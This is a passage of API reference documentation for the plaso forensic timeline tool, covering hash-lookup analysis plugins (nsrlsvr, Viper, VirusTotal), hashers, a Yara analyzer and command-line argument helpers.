class plaso.analysis.nsrlsvr.NsrlsvrAnalysisPluginBases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin

Analysis plugin for looking up hashes in nsrlsvr.

DATA_TYPES = ['fs:stat', 'fs:stat:ntfs']

GenerateLabels(hash_information)Generates a list of strings that will be used in the event tag.

Parameters hash_information (bool) – whether the analyzer received a response fromnsrlsvr indicating that the hash was present in its loaded NSRL set.

Returns strings describing the results from nsrlsvr.


NAME = 'nsrlsvr'

SetHost(host)Sets the address or hostname of the server running nsrlsvr.

Parameters host (str) – IP address or hostname to query.

SetLabel(label)Sets the tagging label.

Parameters label (str) – label to apply to events extracted from files that are present innsrlsvr.

5.1. Subpackages 47


SetPort(port)Sets the port where nsrlsvr is listening.

Parameters port (int) – port to query.

TestConnection()Tests the connection to nsrlsvr.

Returns True if nsrlsvr instance is reachable.

Return type bool

URLS = ['https://rjhansen.github.io/nsrlsvr/']

class plaso.analysis.nsrlsvr.NsrlsvrAnalyzer(hash_queue, hash_analysis_queue,**kwargs)

Bases: plaso.analysis.hash_tagging.HashAnalyzer

Analyzes file hashes by consulting an nsrlsvr instance.

analyses_performednumber of analysis batches completed by this analyzer.

Type int

hashes_per_batchmaximum number of hashes to analyze at once.

Type int

seconds_spent_analyzingnumber of seconds this analyzer has spent performing analysis (as opposed to waiting on queues, etc.)

Type int

wait_after_analysisnumber of seconds the analyzer will sleep for after analyzing a batch of hashes.

Type int

Analyze(hashes)Looks up hashes in nsrlsvr.

Parameters hashes (list[str]) – hash values to look up.

Returns analysis results, or an empty list on error.


SUPPORTED_HASHES = ['md5', 'sha1']

SetHost(host)Sets the address or hostname of the server running nsrlsvr.


SetPort(port)Sets the port where nsrlsvr is listening.


TestConnection()Tests the connection to nsrlsvr.

Checks if a connection can be set up and queries the server for the MD5 of an empty file and expects aresponse. The value of the response is not checked.

Returns True if nsrlsvr instance is reachable.



Return type bool

plaso.analysis.sessionize module

A plugin to tag events according to rules in a tag file.

class plaso.analysis.sessionize.SessionizeAnalysisPluginBases: plaso.analysis.interface.AnalysisPlugin

Analysis plugin that labels events by session.






ExamineEvent(mediator, event, event_data, event_data_stream)Analyzes an EventObject and tags it as part of a session.

Parameters





NAME = 'sessionize'

SetMaximumPause(maximum_pause_minutes)Sets the maximum pause interval between events to consider a session.

Parameters maximum_pause_minutes (int) – maximum gap between events that are partof the same session, in minutes.

plaso.analysis.tagging module

A plugin to tag events according to rules in a tagging file.

class plaso.analysis.tagging.TaggingAnalysisPluginBases: plaso.analysis.interface.AnalysisPlugin

Analysis plugin that tags events according to rules in a tagging file.





5.1. Subpackages 49



ExamineEvent(mediator, event, event_data, event_data_stream)Analyzes an EventObject and tags it according to rules in the tag file.

Parameters





NAME = 'tagging'

SetAndLoadTagFile(tagging_file_path)Sets the tag file to be used by the plugin.

Parameters tagging_file_path (str) – path of the tagging file.

plaso.analysis.unique_domains_visited module

A plugin to generate a list of domains visited.

class plaso.analysis.unique_domains_visited.UniqueDomainsVisitedPluginBases: plaso.analysis.interface.AnalysisPlugin

A plugin to generate a list all domains visited.

This plugin will extract domains from browser history events extracted by Plaso. The list produced can be usedto quickly determine if there has been a visit to a site of interest, for example, a known phishing site.



Returns the analysis report.



ExamineEvent(mediator, event, event_data, event_data_stream)Analyzes an event and extracts domains from it.

We only evaluate straightforward web history events, not visits which can be inferred by TypedURLs,cookies or other means.

Parameters





NAME = 'unique_domains_visited'



plaso.analysis.viper module

Analysis plugin to look up files in Viper and tag events.

class plaso.analysis.viper.ViperAnalysisPluginBases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin

An analysis plugin for looking up SHA256 hashes in Viper.

DATA_TYPES = ['pe:compilation:compilation_time']


Parameters hash_information (dict[str, object]) – JSON decoded contents ofthe result of a Viper lookup, as produced by the ViperAnalyzer.

Returns list of labels to apply to events.


NAME = 'viper'

SetHost(host)Sets the address or hostname of the server running Viper server.


SetPort(port)Sets the port where Viper server is listening.


SetProtocol(protocol)Sets the protocol that will be used to query Viper.

Parameters protocol (str) – protocol to use to query Viper. Either ‘http’ or ‘https’.

Raises ValueError – If an invalid protocol is selected.

TestConnection()Tests the connection to the Viper server.

Returns True if the Viper server instance is reachable.

Return type bool

URLS = ['https://viper.li']

class plaso.analysis.viper.ViperAnalyzer(hash_queue, hash_analysis_queue, **kwargs)Bases: plaso.analysis.hash_tagging.HTTPHashAnalyzer

Class that analyzes file hashes by consulting Viper.

REST API reference: https://viper-framework.readthedocs.io/en/latest/usage/web.html#api

Analyze(hashes)Looks up hashes in Viper using the Viper HTTP API.


Returns hash analysis.


Raises RuntimeError – If no host has been set for Viper.

SUPPORTED_HASHES = ['md5', 'sha256']

5.1. Subpackages 51

https://viper-framework.readthedocs.io/en/latest/usage/web.html#api


SUPPORTED_PROTOCOLS = ['http', 'https']

SetHost(host)Sets the address or hostname of the server running Viper server.


SetPort(port)Sets the port where Viper server is listening.


SetProtocol(protocol)Sets the protocol that will be used to query Viper.

Parameters protocol (str) – protocol to use to query Viper. Either ‘http’ or ‘https’.

Raises ValueError – if the protocol is not supported.

TestConnection()Tests the connection to the Viper server.

Returns True if the Viper server instance is reachable.

Return type bool

plaso.analysis.virustotal module

Analysis plugin to look up files in VirusTotal and tag events.

class plaso.analysis.virustotal.VirusTotalAnalysisPluginBases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin

An analysis plugin for looking up hashes in VirusTotal.

DATA_TYPES = ['pe:compilation:compilation_time']

EnableFreeAPIKeyRateLimit()Configures Rate limiting for queries to VirusTotal.

The default rate limit for free VirusTotal API keys is 4 requests per minute.


Parameters hash_information (dict[str, object]) – the JSON decoded contentsof the result of a VirusTotal lookup, as produced by the VirusTotalAnalyzer.

Returns strings describing the results from VirusTotal.


NAME = 'virustotal'

SetAPIKey(api_key)Sets the VirusTotal API key to use in queries.

Parameters api_key (str) – VirusTotal API key

TestConnection()Tests the connection to VirusTotal

Returns True if VirusTotal is reachable.

Return type bool



URLS = ['https://virustotal.com']

class plaso.analysis.virustotal.VirusTotalAnalyzer(hash_queue,hash_analysis_queue, **kwargs)

Bases: plaso.analysis.hash_tagging.HTTPHashAnalyzer

Class that analyzes file hashes by consulting VirusTotal.

Analyze(hashes)Looks up hashes in VirusTotal using the VirusTotal HTTP API.

The API is documented here: https://developers.virustotal.com/reference


Returns analysis results.


Raises RuntimeError – If the VirusTotal API key has not been set.

SUPPORTED_HASHES = ['md5', 'sha1', 'sha256']

SetAPIKey(api_key)Sets the VirusTotal API key to use in queries.

Parameters api_key (str) – VirusTotal API key

TestConnection()Tests the connection to VirusTotal

Returns True if VirusTotal is reachable.

Return type bool

plaso.analysis.windows_services module

A plugin to enable quick triage of Windows Services.

class plaso.analysis.windows_services.WindowsServiceCollectionBases: object

Class to hold and de-duplicate Windows Services.

AddService(new_service)Add a new service to the list of ones we know about.

Parameters new_service (WindowsService) – the service to add.

property servicesservices in this collection.

Type list[WindowsService]

class plaso.analysis.windows_services.WindowsServicesAnalysisPluginBases: plaso.analysis.interface.AnalysisPlugin

Provides a single list of for Windows services found in the Registry.



Returns report.

5.1. Subpackages 53

https://developers.virustotal.com/reference




ExamineEvent(mediator, event, event_data, event_data_stream)Analyzes an event and creates Windows Services as required.

At present, this method only handles events extracted from the Registry.

Parameters





NAME = 'windows_services'

SetOutputFormat(output_format)Sets the output format of the generated report.

Parameters output_format (str) – format the plugin should used to produce its output.

Module contents

This file imports Python modules that register analysis plugins.

5.1.2 plaso.analyzers package

Subpackages

plaso.analyzers.hashers package

Submodules

plaso.analyzers.hashers.entropy module

The entropy calculation implementation.

class plaso.analyzers.hashers.entropy.EntropyHasherBases: plaso.analyzers.hashers.interface.BaseHasher

Calculates the byte entropy of input files.

ATTRIBUTE_NAME = 'file_entropy'

DESCRIPTION = 'Calculates the byte entropy of input data.'

GetStringDigest()Calculates the byte entropy value.

Byte entropy is a value between 0.0 and 8.0, and is returned as a string to match the Plaso analyzer andstorage APIs.

Returns



byte entropy formatted as a floating point number with 6 decimal places calculatedover the data blocks passed to Update().

Return type str

NAME = 'entropy'

Update(data)Updates the state of the entropy calculator with a new block of data.

Repeated calls to update are equivalent to one single call with the concatenation of the arguments.

Parameters data (bytes) – block of data with which to update the context of the entropycalculator.

plaso.analyzers.hashers.interface module

The hasher interface.

class plaso.analyzers.hashers.interface.BaseHasherBases: object

Base class for objects that calculate hashes.

ATTRIBUTE_NAME = 'hash'

DESCRIPTION = 'Calculates a digest hash over input data.'

abstract GetStringDigest()Retrieves the digest of the hash function expressed as a Unicode string.

Returns

string hash digest calculated over the data blocks passed to Update(). The string con-sists of printable Unicode characters.

Return type str

NAME = 'base_hasher'

abstract Update(data)Updates the current state of the hasher with a new block of data.


Parameters data (bytes) – data with which to update the context of the hasher.

plaso.analyzers.hashers.manager module

This file contains a class for managing digest hashers for Plaso.

class plaso.analyzers.hashers.manager.HashersManagerBases: object

Class that implements the hashers manager.

classmethod DeregisterHasher(hasher_class)Deregisters a hasher class.

The hasher classes are identified based on their lower case name.

Parameters hasher_class (type) – class object of the hasher.

5.1. Subpackages 55


Raises KeyError – if hasher class is not set for the corresponding name.

classmethod GetHasher(hasher_name)Retrieves an instance of a specific hasher.

Parameters hasher_name (str) – the name of the hasher to retrieve.

Returns hasher.

Return type BaseHasher

Raises KeyError – if hasher class is not set for the corresponding name.

classmethod GetHasherClasses(hasher_names=None)Retrieves the registered hashers.

Parameters hasher_names (list[str]) – names of the hashers to retrieve.

Yields tuple –

containing:

str: parser name type: next hasher class.

classmethod GetHasherNames()Retrieves the names of all loaded hashers.

Returns hasher names.


classmethod GetHasherNamesFromString(hasher_names_string)Retrieves a list of a hasher names from a comma separated string.

Takes a string of comma separated hasher names transforms it to a list of hasher names.

Parameters hasher_names_string (str) – comma separated names of hashers to enable,the string ‘all’ to enable all hashers or ‘none’ to disable all hashers.

Returns

names of valid hashers from the string, or an empty list if no valid names are found.


classmethod GetHashers(hasher_names)Retrieves instances for all the specified hashers.

Parameters hasher_names (list[str]) – names of the hashers to retrieve.

Returns hashers.

Return type list[BaseHasher]

classmethod GetHashersInformation()Retrieves the hashers information.

Returns

containing:

str: hasher name. str: hasher description.

Return type list[tuple]

classmethod RegisterHasher(hasher_class)Registers a hasher class.

The hasher classes are identified based on their lower case name.



Parameters hasher_class (type) – class object of the hasher.

Raises KeyError – if hasher class is already set for the corresponding name.

plaso.analyzers.hashers.md5 module

The MD5 hasher implementation.

class plaso.analyzers.hashers.md5.MD5HasherBases: plaso.analyzers.hashers.interface.BaseHasher

This class provides MD5 hashing functionality.

ATTRIBUTE_NAME = 'md5_hash'

DESCRIPTION = 'Calculates an MD5 digest hash over input data.'

GetStringDigest()Returns the digest of the hash function expressed as a Unicode string.

Returns


Return type str

NAME = 'md5'

Update(data)Updates the current state of the hasher with a new block of data.


Parameters data (bytes) – block of data with which to update the context of the hasher.

plaso.analyzers.hashers.sha1 module

The SHA-1 Hasher implementation

class plaso.analyzers.hashers.sha1.SHA1HasherBases: plaso.analyzers.hashers.interface.BaseHasher

This class provides SHA-1 hashing functionality.

ATTRIBUTE_NAME = 'sha1_hash'

DESCRIPTION = 'Calculates a SHA-1 digest hash over input data.'


Returns


Return type str

NAME = 'sha1'

5.1. Subpackages 57





plaso.analyzers.hashers.sha256 module

The SHA-256 Hasher implementation

class plaso.analyzers.hashers.sha256.SHA256HasherBases: plaso.analyzers.hashers.interface.BaseHasher

This class provides SHA-256 hashing functionality.

ATTRIBUTE_NAME = 'sha256_hash'

DESCRIPTION = 'Calculates a SHA-256 digest hash over input data.'


Returns


Return type str

NAME = 'sha256'




Module contents

This file imports Python modules that register hashers.

Submodules

plaso.analyzers.hashing_analyzer module

The hashing analyzer implementation.

class plaso.analyzers.hashing_analyzer.HashingAnalyzerBases: plaso.analyzers.interface.BaseAnalyzer

This class contains code for calculating file hashes of input files.

In Plaso, hashers are classes that map arbitrarily sized file content to a fixed size value. See: https://en.wikipedia.org/wiki/Hash_function

Analyze(data)Updates the internal state of the analyzer, processing a block of data.

Repeated calls are equivalent to a single call with the concatenation of all the arguments.


https://en.wikipedia.org/wiki/Hash_function

https://en.wikipedia.org/wiki/Hash_function


Parameters data (bytes) – block of data from the data stream.

DESCRIPTION = 'Calculates hashes of file content.'

GetResults()Retrieves the hashing results.

Returns results.

Return type list[AnalyzerResult]

INCREMENTAL_ANALYZER = True

NAME = 'hashing'

PROCESSING_STATUS_HINT = 'hashing'

Reset()Resets the internal state of the analyzer.

SetHasherNames(hasher_names_string)Sets the hashers that should be enabled.

Parameters hasher_names_string (str) – comma separated names of hashers to enable.

plaso.analyzers.interface module

Definitions to provide a whole-file processing framework.

class plaso.analyzers.interface.BaseAnalyzerBases: object

Class that provides the interface for whole-file analysis.

abstract Analyze(data)Analyzes a block of data, updating the state of the analyzer

Parameters data (bytes) – block of data to process.

DESCRIPTION = ''

abstract GetResults()Retrieves the results of the analysis.

Returns results.


INCREMENTAL_ANALYZER = False

NAME = 'base_analyzer'

PROCESSING_STATUS_HINT = 'analyzing'

abstract Reset()Resets the internal state of the analyzer.

SIZE_LIMIT = 33554432

5.1. Subpackages 59


plaso.analyzers.logger module

The analyzers sub module logger.

plaso.analyzers.manager module

This file contains a class for managing digest analyzers for Plaso.

class plaso.analyzers.manager.AnalyzersManagerBases: object

Class that implements the analyzers manager.

classmethod DeregisterAnalyzer(analyzer_class)Deregisters a analyzer class.

The analyzer classes are identified based on their lower case name.

Parameters analyzer_class (type) – class object of the analyzer.

Raises KeyError – if analyzer class is not set for the corresponding name.

classmethod GetAnalyzerInstance(analyzer_name)Retrieves an instance of a specific analyzer.

Parameters analyzer_name (str) – name of the analyzer to retrieve.

Returns analyzer instance.

Return type BaseAnalyzer

Raises KeyError – if analyzer class is not set for the corresponding name.

classmethod GetAnalyzerInstances(analyzer_names)Retrieves instances for all the specified analyzers.

Parameters analyzer_names (list[str]) – names of the analyzers to retrieve.

Returns analyzer instances.

Return type list[BaseAnalyzer]

classmethod GetAnalyzerNames()Retrieves the names of all loaded analyzers.

Returns of analyzer names.


classmethod GetAnalyzers()Retrieves the registered analyzers.

Yields tuple –

containing:

str: the uniquely identifying name of the analyzer type: the analyzer class.

classmethod GetAnalyzersInformation()Retrieves the analyzers information.

Returns

containing:

str: analyzer name. str: analyzer description.




classmethod RegisterAnalyzer(analyzer_class)Registers a analyzer class.

The analyzer classes are identified by their lower case name.

Parameters analyzer_class (type) – the analyzer class to register.

Raises KeyError – if analyzer class is already set for the corresponding name.

plaso.analyzers.yara_analyzer module

Analyzer that matches Yara rules.

class plaso.analyzers.yara_analyzer.YaraAnalyzerBases: plaso.analyzers.interface.BaseAnalyzer

Analyzer that matches Yara rules.

Analyze(data)Analyzes a block of data, attempting to match Yara rules to it.

Parameters data (bytes) – a block of data.

DESCRIPTION = 'Matches Yara rules over input data.'

GetResults()Retrieves results of the most recent analysis.

Returns results.


INCREMENTAL_ANALYZER = False

NAME = 'yara'

PROCESSING_STATUS_HINT = 'yara scan'

Reset()Resets the internal state of the analyzer.

SetRules(rules_string)Sets the rules that the Yara analyzer will use.

Parameters rules_string (str) – Yara rule definitions

Module contents

This file imports Python modules that register analyzers.

5.1. Subpackages 61


5.1.3 plaso.cli package

Subpackages

plaso.cli.helpers package

Submodules

plaso.cli.helpers.analysis_plugins module

The analysis plugins CLI arguments helper.

class plaso.cli.helpers.analysis_plugins.AnalysisPluginsArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Analysis plugins CLI arguments helper.

classmethod AddArguments(argument_group)Adds command line arguments to an argument group.

This function takes an argument parser or an argument group object and adds to it all the command linearguments this helper supports.

Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

DESCRIPTION = 'Analysis plugins command line arguments.'

NAME = 'analysis_plugins'

classmethod ParseOptions(options, configuration_object)Parses and validates options.

Parameters

• options (argparse.Namespace) – parser options.

• configuration_object (CLITool) – object to be configured by the argumenthelper.

Raises

• BadConfigObject – when the configuration object is of the wrong type.

• BadConfigOption – when non-existing analysis plugins are specified.

plaso.cli.helpers.artifact_definitions module

The artifact definitions CLI arguments helper.

class plaso.cli.helpers.artifact_definitions.ArtifactDefinitionsArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Artifact definition CLI arguments helper.






DESCRIPTION = 'Artifact definition command line arguments.'

NAME = 'artifact_definitions'


Parameters



Raises


• BadConfigOption – if the required artifact definitions are not defined.

plaso.cli.helpers.artifact_filters module

The artifacts filter file CLI arguments helper.

class plaso.cli.helpers.artifact_filters.ArtifactFiltersArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Artifacts filter file CLI arguments helper.




DESCRIPTION = 'Artifact filters command line arguments.'

NAME = 'artifact_filters'


Parameters



Raises


• BadConfigOption – if the required artifact definitions are not defined.

5.1. Subpackages 63


plaso.cli.helpers.data_location module

The data location CLI arguments helper.

class plaso.cli.helpers.data_location.DataLocationArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Data location CLI arguments helper.




DESCRIPTION = 'Data location command line arguments.'

NAME = 'data_location'


Parameters



Raises


• BadConfigOption – when the location of the data files cannot be determined.

plaso.cli.helpers.database_config module

The database configuration CLI arguments helper.

class plaso.cli.helpers.database_config.DatabaseArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Database configuration CLI arguments helper.

classmethod AddArguments(argument_group)Adds command line arguments the helper supports to an argument group.



DESCRIPTION = 'Argument helper for a database configuration.'

NAME = 'database_config'

classmethod ParseOptions(options, output_module)Parses and validates options.

Parameters




• output_module (OutputModule) – output module to configure.

Raises BadConfigObject – when the output module object does not have the SetCredentialsor SetDatabaseName methods.

plaso.cli.helpers.date_filters module

The date filters CLI arguments helper.

class plaso.cli.helpers.date_filters.DateFiltersArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Date filters CLI arguments helper.




DESCRIPTION = 'Date filters command line arguments.'

NAME = 'date_filters'


Parameters



Raises


• BadConfigOption – when the date filter is badly formatted.

plaso.cli.helpers.dynamic_output module

The dynamic output module CLI arguments helper.

class plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Dynamic output module CLI arguments helper.




5.1. Subpackages 65


CATEGORY = 'output'

DESCRIPTION = 'Argument helper for the dynamic output module.'

NAME = 'dynamic'


Parameters



Raises

• BadConfigObject – when the output module object is of the wrong type.

• BadConfigOption – when the output filename was not provided.

plaso.cli.helpers.elastic_output module

The Elastic Search output module CLI arguments helper.

class plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Elastic Search output module CLI arguments helper.




CATEGORY = 'output'

DESCRIPTION = 'Argument helper for the Elastic Search output modules.'

NAME = 'elastic'


Parameters



Raises


• BadConfigOption – when a configuration parameter fails validation.

class plaso.cli.helpers.elastic_output.ElasticSearchServerArgumentsHelperBases: plaso.cli.helpers.server_config.ServerArgumentsHelper

Elastic Search server CLI arguments helper.



plaso.cli.helpers.event_filters module

The event filters CLI arguments helper.

class plaso.cli.helpers.event_filters.EventFiltersArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Event filters CLI arguments helper.




DESCRIPTION = 'Event filters command line arguments.'

NAME = 'event_filters'


Parameters



Raises



plaso.cli.helpers.extraction module

The extraction CLI arguments helper.

class plaso.cli.helpers.extraction.ExtractionArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Extraction CLI arguments helper.




DESCRIPTION = 'Extraction command line arguments.'

NAME = 'extraction'


Parameters

5.1. Subpackages 67




Raises BadConfigObject – when the configuration object is of the wrong type.

plaso.cli.helpers.filter_file module

The filter file CLI arguments helper.

class plaso.cli.helpers.filter_file.FilterFileArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Filter file CLI arguments helper.




DESCRIPTION = 'Filter file command line arguments.'

NAME = 'filter_file'


Parameters



Raises


• BadConfigOption – if the collection file does not exist.

plaso.cli.helpers.hashers module

The hashers CLI arguments helper.

class plaso.cli.helpers.hashers.HashersArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Hashers CLI arguments helper.






DESCRIPTION = 'Hashers command line arguments.'

NAME = 'hashers'


Parameters



Raises



plaso.cli.helpers.interface module

The arguments helper interface.

class plaso.cli.helpers.interface.ArgumentsHelperBases: object

CLI arguments helper.




CATEGORY = ''

DESCRIPTION = ''

NAME = 'baseline'


Parameters


• configuration_object (object) – object to be configured by the argument helper.

Raises



5.1. Subpackages 69


plaso.cli.helpers.language module

The language CLI arguments helper.

class plaso.cli.helpers.language.LanguageArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Language CLI arguments helper.




DESCRIPTION = 'Language command line arguments.'

NAME = 'language'


Parameters




plaso.cli.helpers.manager module

The CLI arguments helper manager objects.

class plaso.cli.helpers.manager.ArgumentHelperManagerBases: object

Class that implements the CLI argument helper manager.

classmethod AddCommandLineArguments(argument_group, category=None, names=None)Adds command line arguments to a configuration object.

Parameters

• argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

• category (Optional[str]) – category of helpers to apply to the group, such asstorage, output, where None will apply the arguments to all helpers. The category can beused to add arguments to a specific group of registered helpers.

• names (Optional[list[str]]) – names of argument helpers to apply, where Nonewill apply the arguments to all helpers.

classmethod DeregisterHelper(helper_class)Deregisters a helper class.

The helper classes are identified based on their lower case name.

Parameters helper_class (type) – class object of the argument helper.



Raises KeyError – if helper class is not set for the corresponding name.

classmethod ParseOptions(options, config_object, category=None, names=None)Parses and validates arguments using the appropriate helpers.

Parameters


• config_object (object) – object to be configured by an argument helper.

• category (Optional[str]) – category of helpers to apply to the group, such asstorage, output, where None will apply the arguments to all helpers. The category can beused to add arguments to a specific group of registered helpers.

• names (Optional[list[str]]) – names of argument helpers to apply, where Nonewill apply the arguments to all helpers.

classmethod RegisterHelper(helper_class)Registers a helper class.


Parameters helper_class (type) – class object of the argument helper.

Raises KeyError – if helper class is already set for the corresponding name.

classmethod RegisterHelpers(helper_classes)Registers helper classes.


Parameters helper_classes (list[type]) – class objects of the argument helpers.

Raises KeyError – if helper class is already set for the corresponding name.

plaso.cli.helpers.nsrlsvr_analysis module

The nsrlsvr analysis plugin CLI arguments helper.

class plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Nsrlsvr analysis plugin CLI arguments helper.



Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – group to append arguments to.

CATEGORY = 'analysis'

DESCRIPTION = 'Argument helper for the nsrlsvr analysis plugin.'

NAME = 'nsrlsvr'

classmethod ParseOptions(options, analysis_plugin)Parses and validates options.

Parameters

5.1. Subpackages 71


• options (argparse.Namespace) – parser options object.

• analysis_plugin (NsrlsvrAnalysisPlugin) – analysis plugin to configure.

Raises

• BadConfigObject – when the analysis plugin is the wrong type.

• BadConfigOption – when unable to connect to nsrlsvr instance.

plaso.cli.helpers.output_modules module

The output modules CLI arguments helper.

class plaso.cli.helpers.output_modules.OutputModulesArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Output modules CLI arguments helper.




DESCRIPTION = 'Output modules command line arguments.'

NAME = 'output_modules'


Parameters



Raises


• BadConfigOption – when the output format is not supported or the output is not pro-vided or already exists.

plaso.cli.helpers.parsers module

The parsers CLI arguments helper.

class plaso.cli.helpers.parsers.ParsersArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Parsers CLI arguments helper.






DESCRIPTION = 'Parsers command line arguments.'

NAME = 'parsers'


Parameters




plaso.cli.helpers.process_resources module

The process resources CLI arguments helper.

class plaso.cli.helpers.process_resources.ProcessResourcesArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Process resources CLI arguments helper.




DESCRIPTION = 'Process resources command line arguments.'

NAME = 'process_resources'


Parameters



Raises



5.1. Subpackages 73


plaso.cli.helpers.profiling module

The profiling CLI arguments helper.

class plaso.cli.helpers.profiling.ProfilingArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Profiling CLI arguments helper.




DEFAULT_PROFILING_SAMPLE_RATE = 1000

DESCRIPTION = 'Profiling command line arguments.'

NAME = 'profiling'

PROFILERS_INFORMATION = {'analyzers': 'Profile CPU time of analyzers, like hashing', 'memory': 'Profile memory usage over time', 'parsers': 'Profile CPU time per parser', 'processing': 'Profile CPU time of processing phases', 'serializers': 'Profile CPU time of serialization', 'storage': 'Profile storage reads and writes', 'task_queue': 'Profile task queue status (multi-processing only)', 'tasks': 'Profile the status of tasks (multi-processing only)'}


Parameters



Raises


• BadConfigOption – when the configuration options are missing or not supported.

plaso.cli.helpers.server_config module

The server configuration CLI arguments helper.

class plaso.cli.helpers.server_config.ServerArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Server configuration CLI arguments helper.




DESCRIPTION = 'Argument helper for a server configuration.'

NAME = 'server_config'




Parameters



Raises BadConfigObject – when the output module object does not have the SetServerIn-formation method.

plaso.cli.helpers.sessionize_analysis module

The sessionize analysis plugin CLI arguments helper.

class plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Sessionize analysis plugin CLI arguments helper.





DESCRIPTION = 'Argument helper for the Sessionize analysis plugin.'

NAME = 'sessionize'


Parameters


• analysis_plugin (OutputModule) – analysis_plugin to configure.

Raises



plaso.cli.helpers.status_view module

The status view CLI arguments helper.

class plaso.cli.helpers.status_view.StatusViewArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Status view CLI arguments helper.

5.1. Subpackages 75





DESCRIPTION = 'Status view command line arguments.'

NAME = 'status_view'


Parameters




plaso.cli.helpers.storage_file module

The storage file CLI arguments helper.

class plaso.cli.helpers.storage_file.StorageFileArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Storage file CLI arguments helper.




DESCRIPTION = 'Storage file command line arguments.'

NAME = 'storage_file'


Parameters






plaso.cli.helpers.storage_format module

The storage format CLI arguments helper.

class plaso.cli.helpers.storage_format.StorageFormatArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Storage format CLI arguments helper.




DESCRIPTION = 'Storage format command line arguments.'

NAME = 'storage_format'


Parameters



Raises


• BadConfigOption – if the storage format or task storage is not defined or supported.

plaso.cli.helpers.tagging_analysis module

The tagging analysis plugin CLI arguments helper.

class plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Tagging analysis plugin CLI arguments helper.





DESCRIPTION = 'Argument helper for the Tagging analysis plugin.'

NAME = 'tagging'


5.1. Subpackages 77


Parameters


• analysis_plugin (AnalysisPlugin) – analysis plugin to configure.

Raises



plaso.cli.helpers.temporary_directory module

The temporary directory CLI arguments helper.

class plaso.cli.helpers.temporary_directory.TemporaryDirectoryArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Temporary directory CLI arguments helper.




DESCRIPTION = 'Temporary directory command line arguments.'

NAME = 'temporary_directory'


Parameters



Raises


• BadConfigOption – when the temporary directory does not exists.

plaso.cli.helpers.text_prepend module

The text prepend CLI arguments helper.

class plaso.cli.helpers.text_prepend.TextPrependArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Text prepend CLI arguments helper.






DESCRIPTION = 'Text prepend command line arguments.'

NAME = 'text_prepend'


Parameters




plaso.cli.helpers.timesketch_output module

The Timesketch output module CLI arguments helper.

class plaso.cli.helpers.timesketch_output.TimesketchOutputArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Timesketch output module CLI arguments helper.




CATEGORY = 'output'

DESCRIPTION = 'Argument helper for the timesketch output module.'

NAME = 'timesketch'


Parameters


• output_module (TimesketchOutputModule) – output module to configure.

Raises



5.1. Subpackages 79


plaso.cli.helpers.vfs_backend module

The VFS back-end CLI arguments helper.

class plaso.cli.helpers.vfs_backend.VFSBackEndArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

VFS back-end CLI arguments helper.




DESCRIPTION = 'dfVFS back-end command line arguments.'

NAME = 'vfs_backend'


Parameters




plaso.cli.helpers.viper_analysis module

The Viper analysis plugin CLI arguments helper.

class plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Viper analysis plugin CLI arguments helper.





DESCRIPTION = 'Argument helper for the Viper analysis plugin.'

NAME = 'viper'


Parameters




• analysis_plugin (ViperAnalysisPlugin) – analysis plugin to configure.

Raises


• BadConfigOption – when unable to connect to Viper instance.

plaso.cli.helpers.virustotal_analysis module

The VirusTotal analysis plugin CLI arguments helper.

class plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

VirusTotal analysis plugin CLI arguments helper.





DESCRIPTION = 'Argument helper for the VirusTotal analysis plugin.'

NAME = 'virustotal'


Parameters


• analysis_plugin (VirusTotalAnalysisPlugin) – analysis plugin to config-ure.

Raises


• BadConfigOption – when a configuration parameter fails validation or when unableto connect to VirusTotal.

plaso.cli.helpers.windows_services_analysis module

The Windows Services analysis plugin CLI arguments helper.

class plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Windows Services analysis plugin CLI arguments helper.



5.1. Subpackages 81




DESCRIPTION = 'Argument helper for the Windows Services analysis plugin.'



Parameters


• analysis_plugin (WindowsServicePlugin) – analysis plugin to configure.

Raises BadConfigObject – when the output module object is of the wrong type.

plaso.cli.helpers.workers module

